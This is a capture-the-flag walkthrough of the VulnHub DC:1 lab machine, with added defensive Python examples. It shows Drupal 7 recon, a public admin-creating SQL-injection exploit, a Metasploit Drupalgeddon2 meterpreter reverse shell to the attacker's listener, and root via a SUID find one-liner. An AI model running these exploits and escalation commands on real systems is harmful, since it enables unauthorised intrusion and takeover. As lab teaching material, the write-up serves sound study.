[vulnhub] DC:1

陈陈

Introduction

The first machine of the DC series on vulnhub. Fairly easy.

Information Gathering

nmap

Host discovery, port scan, TCP scan, service identification, OS detection, and script-based vulnerability scan:

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:19 CST
Nmap scan report for 192.168.56.1
Host is up (0.00053s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.000092s latency).
MAC Address: 08:00:27:2E:A1:5A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.109
Host is up (0.00057s latency).
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.31 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:20 CST
Warning: 192.168.56.109 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.109
Host is up (0.00030s latency).
Not shown: 40138 filtered tcp ports (no-response), 25393 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
49001/tcp open nusrp
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 116.03 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,80,111,49001 192.168.56.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:22 CST
Nmap scan report for 192.168.56.109
Host is up (0.00088s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4d659e6774c227a961660678b42488f (DSA)
| 2048 1182fe534edc5b327f446482757dd0a0 (RSA)
|_ 256 3daa985c87afea84b823688db9055fd8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37080/udp status
| 100024 1 47634/udp6 status
| 100024 1 49001/tcp status
|_ 100024 1 53648/tcp6 status
49001/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds


┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 14:23 CST
Nmap scan report for 192.168.56.109
Host is up (0.00032s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /UPGRADE.txt: Drupal file
| /INSTALL.txt: Drupal file
| /INSTALL.mysql.txt: Drupal file
| /INSTALL.pgsql.txt: Drupal file
| /: Drupal version 7
| /README: Interesting, a readme.
| /README.txt: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /user/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.109
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.109:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.56.109:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://192.168.56.109:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://192.168.56.109:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://192.168.56.109:80/user
| Form id: user-login
| Form action: /user
|
| Path: http://192.168.56.109:80/user/
| Form id: user-login
|_ Form action: /user/
| http-vuln-cve2014-3704:
| VULNERABLE:
| Drupal - pre Auth SQL Injection Vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-3704
| The expandArguments function in the database abstraction API in
| Drupal core 7.x before 7.32 does not properly construct prepared
| statements, which allows remote attackers to conduct SQL injection
| attacks via an array containing crafted keys.
|
| Disclosure date: 2014-10-15
| References:
| http://www.securityfocus.com/bid/70595
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
| https://www.drupal.org/SA-CORE-2014-005
|_ https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind
MAC Address: 08:00:27:5F:F1:0D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 356.20 seconds

Port 80 gives away a lot: a pile of information, and it even flags the CVE-2014-3704 vulnerability. No need to say which one to go after first.
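The nmap finding above describes the bug as prepared statements built from an array with crafted keys. As an added example, not code from the original post or from Drupal, here is that placeholder expansion re-created in Python with the corrected behaviour selectable by a flag; the function names, the ':name' placeholder convention and the sample query are assumptions of this demo.

```python
"""Added example (not code from the original post or from Drupal): a Python
re-creation of the placeholder expansion that the nmap finding describes
(expandArguments in Drupal 7 before 7.32, CVE-2014-3704), with the corrected
logic selectable by a flag. Assumptions: names are ours and only the shape of
the logic follows Drupal; placeholders are written ':name' as in Drupal; the
query and argument arrays below are constructed for the demo.
"""
import re
from typing import Any, Dict, Tuple


def expand_placeholders(query: str, args: Dict[str, Any],
                        renumber: bool) -> Tuple[str, Dict[str, Any]]:
    """Expand each array-valued argument ':k' into ':k_<i>' placeholders.

    renumber=False reproduces the pre-7.32 behaviour: <i> is the array's own
    key, used verbatim. In Drupal those keys can come from the HTTP request,
    so request data is written straight into the SQL text.
    renumber=True is the 7.32 fix: the array is renumbered first, so only
    0, 1, 2 ... ever reach the query and the caller's keys are discarded.
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        items = enumerate(data.values()) if renumber else data.items()
        new_keys = {f"{key}_{i}": value for i, value in items}
        joined = ", ".join(new_keys)
        # Drupal: preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query)
        query = re.sub(re.escape(key) + r"\b", lambda _m: joined, query)
        del args[key]
        args.update(new_keys)
    return query, args


# Constructed samples: a normal IN() lookup, and one whose array keys are
# not the expected 0, 1, 2 ... sequence.
QUERY = "SELECT uid FROM users WHERE name IN (:names)"
GOOD_ARGS = {":names": {0: "alice", 1: "bob"}}
ODD_ARGS = {":names": {"a b": "alice"}}   # a key that is not a valid placeholder name

if __name__ == "__main__":
    print(expand_placeholders(QUERY, GOOD_ARGS, renumber=False)[0])
    print(expand_placeholders(QUERY, ODD_ARGS, renumber=False)[0])  # key lands in the SQL verbatim
    print(expand_placeholders(QUERY, ODD_ARGS, renumber=True)[0])   # renumbered to :names_0
```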

Web Penetration

As everyone knows, you have to scout the place before making a move. First, identify the site's technology stack.

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo whatweb http://192.168.56.109
[sudo] password for kali:
http://192.168.56.109 [200 OK] Apache[2.2.22], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], IP[192.168.56.109], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.4.45-0+deb7u14], PasswordField[pass], Script[php,text/javascript], Title[Drupal Site], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]

The site turns out to be built on the Drupal 7 CMS. Combined with the CVE-2014-3704 finding from earlier, we plan to exploit this CMS vulnerability.
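A defender's version of the same identification step, added here as an example and not code from the original post: parse the header of a Drupal 7 CHANGELOG.txt (a file the robots.txt output above lists) and report which of the fixes for the advisories on this page the install is still missing. The header format and the sample changelog are assumptions labelled in the code.

```python
"""Added example (not code from the original post): decide from the header of a
Drupal 7 CHANGELOG.txt which of the fixes named on this page an install lacks.
Assumptions: the file starts with a line like "Drupal 7.31, 2014-08-06"; the
fix releases below come from the advisory and exploit titles quoted on the
page (7.32 for CVE-2014-3704 / SA-CORE-2014-005, 7.58 for Drupalgeddon2/3).
The sample changelog is constructed for the demo.
"""
import re
from typing import List, Optional, Tuple

# Advisory -> first Drupal 7 release that contains the fix.
FIXED_IN = {
    "CVE-2014-3704 / SA-CORE-2014-005 (fixed in 7.32)": (7, 32),
    "Drupalgeddon2 / Drupalgeddon3 (fixed in 7.58)": (7, 58),
}

# First line of CHANGELOG.txt: "Drupal <major>.<minor>, <date>"
_HEADER_RE = re.compile(r"^Drupal\s+(\d+)\.(\d+)\s*,", re.MULTILINE)


def parse_changelog_version(changelog: str) -> Optional[Tuple[int, int]]:
    """Return (major, minor) from the first 'Drupal X.Y, date' line, else None."""
    m = _HEADER_RE.search(changelog)
    return (int(m.group(1)), int(m.group(2))) if m else None


def missing_fixes(version: Optional[Tuple[int, int]]) -> List[str]:
    """Advisories whose fix release is newer than the running 7.x version.

    None or a non-7.x version yields [] because the thresholds above only
    describe the 7.x branch; treat that as 'unknown', not as 'patched'.
    """
    if version is None or version[0] != 7:
        return []
    return [name for name, fixed in FIXED_IN.items() if version < fixed]


# Constructed sample: header of a CHANGELOG.txt from an unpatched 7.x site.
SAMPLE_CHANGELOG = """Drupal 7.24, 2013-11-20
-----------------------
- Fixed security issues (multiple vulnerabilities).
"""

if __name__ == "__main__":
    version = parse_changelog_version(SAMPLE_CHANGELOG)
    print("Drupal version from CHANGELOG.txt:", version)
    for advisory in missing_fixes(version):
        print("missing fix:", advisory)
```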

Before going further, don't forget to leave a directory discovery scan running in the background; there might be something good. (It does in fact turn up many directories and files, though not necessarily useful to us.)

Search for public exploits:

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ searchsploit Drupal
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Executio | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vul | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admi | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Se | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Re | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Re | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote C | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Cod | php/webapps/44542.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Cod | php/webapps/44557.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddo | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remot | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remot | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserial | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execu | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Dis | php/webapps/44501.txt
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripti | php/webapps/50841.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Inject | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandl | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Per | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasp | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execut | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-S | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' A | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flots | php/webapps/35072.txt
Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalati | php/webapps/50361.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Meta | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection | php/webapps/33410.txt
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Among these, 34992.py says "Add Admin", which is quite attractive to us. Let's see how it goes.

Exploitation

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ python2 34992.py -t http://192.168.56.109 -u test -p test

______ __ _______ _______ _____
| _ \ .----.--.--.-----.---.-| | | _ || _ | _ |
|. | \| _| | | _ | _ | | |___| _|___| |.| |
|. | |__| |_____| __|___._|__| / |___(__ `-|. |
|: 1 / |__| | | |: 1 | |: |
|::.. . / | | |::.. . | |::.|
`------' `---' `-------' `---'
_______ __ ___ __ __ __
| _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.
| 1___| _ | | |. | | | -__| __| _| | _ | |
|____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|
|: 1 | |__| |: | |___|
|::.. . | |::.|
`-------' `---'

Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
Admin 4cc0unt cr3at0r

Discovered by:

Stefan Horst
(CVE-2014-3704)

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: test
[*] Pass: test
[*] Url: http://192.168.56.109/?q=node&destination=node

The account was added successfully, and we can log in as administrator.

(screenshot: drupal-backend)

Unfortunately, after poking around the admin backend for a long while, in the Content area, whether adding PHP code or uploading a PHP file, it either gets commented out or renamed. Nothing exploitable there.

Searching online, I found people saying that enabling the PHP filter module in the Modules area lets you embed PHP code in a block.

So I tried it, but the block still only offered the three options Full HTML, Filtered HTML and Plain text, and embedded PHP code still wouldn't execute. Had to give up on this path for now.

So let's see what other vulnerabilities can be used; after all, we found so many exploits earlier. Looking through them, there are many remote command execution exploits. I downloaded a few and using them directly didn't work, then noticed there are also some exploits in msf, so let's try msf.

┌──(kali㉿kali)-[~/vulnhub/DC/1/workSpace]
└─$ sudo msfconsole
[sudo] password for kali:

######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
https://metasploit.com


=[ metasploit v6.3.16-dev ]
+ -- --=[ 2315 exploits - 1208 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search drupal

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf6 exploit(unix/webapp/drupal_restws_exec) > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS 192.168.56.109 yes The target host(s), see https://docs.metasploit.
com/docs/using-metasploit/basics/using-metasploi
t.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.144 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic (PHP In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.56.144:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.56.109
[*] Meterpreter session 1 opened (192.168.56.144:4444 -> 192.168.56.109:54480) at 2023-05-27 16:10:19 +0800

meterpreter > pwd
/var/www
meterpreter > getuid
Server username: www-data
meterpreter >

We tried 0 and 4, neither worked; 1 succeeded.

From here you can just use the shell command to get a shell, or upload a reverse shell of your own.

Privilege Escalation

sudo -l shows that sudo has been removed.

Check for binaries with the SUID bit set:

find / -type f -perm -u=s -ls 2>/dev/null

find itself has the s bit set.

Use it directly:

www-data@DC-1:/usr/bin$ ./find . -exec /bin/sh -p \; -quit    
/bin/sh: 0: Illegal option -p

The -p option can't be used; try without it.

www-data@DC-1:/usr/bin$ find . -exec /bin/sh \; -quit     
find . -exec /bin/sh \; -quit
# whoami
whoami
root
# cd ~
cd ~
/bin/sh: 2: cd: can't cd to ~
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------ 4 root root 4096 Feb 28 2019 .
drwxr-xr-x 23 root root 4096 Feb 19 2019 ..
drwx------ 2 root root 4096 Feb 19 2019 .aptitude
-rw------- 1 root root 44 Feb 28 2019 .bash_history
-rw-r--r-- 1 root root 949 Feb 19 2019 .bashrc
drwxr-xr-x 3 root root 4096 Feb 19 2019 .drush
-rw-r--r-- 1 root root 140 Nov 20 2007 .profile
-rw-r--r-- 1 root root 173 Feb 19 2019 thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

Easy privilege escalation.
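The defender's counterpart to the SUID search used above, added here as an example and not code from the original walkthrough: walk a tree, collect setuid files the way the find one-liner does, and flag any whose name is not on an allowlist of expected setuid programs, which is how find on DC-1 would stand out. The allowlist and the sample tree are constructed assumptions; on a real host build the allowlist from the package manager's file manifest and run the audit as root so no directory is skipped.

```python
"""Added example (not code from the original walkthrough): audit a directory
tree for regular files with the setuid bit (what find / -perm -u=s reports)
and flag those whose name is not on an allowlist of expected setuid programs.
Assumptions: the allowlist is a placeholder for the demo, not a system
baseline, and the sample tree is constructed in a temporary directory.
"""
import os
import stat
import tempfile
from typing import List

# Constructed allowlist: setuid programs a stock install is expected to carry.
EXPECTED_SUID = {"passwd", "su", "sudo", "mount", "umount"}


def find_setuid(root: str) -> List[str]:
    """Paths of regular files under root with the setuid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # unreadable entry, like 2>/dev/null above
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_setuid(root: str, expected=EXPECTED_SUID) -> List[str]:
    """Setuid files whose basename is not allowlisted; each needs a reason to exist."""
    allowed = set(expected)
    return [p for p in find_setuid(root) if os.path.basename(p) not in allowed]


def build_demo_tree() -> str:
    """Constructed sample: passwd (expected setuid), find (unexpected setuid), ls (plain)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("find", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)                 # chmod after the write so the bit survives
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for path in unexpected_setuid(demo):
        print("unexpected setuid binary:", path)
```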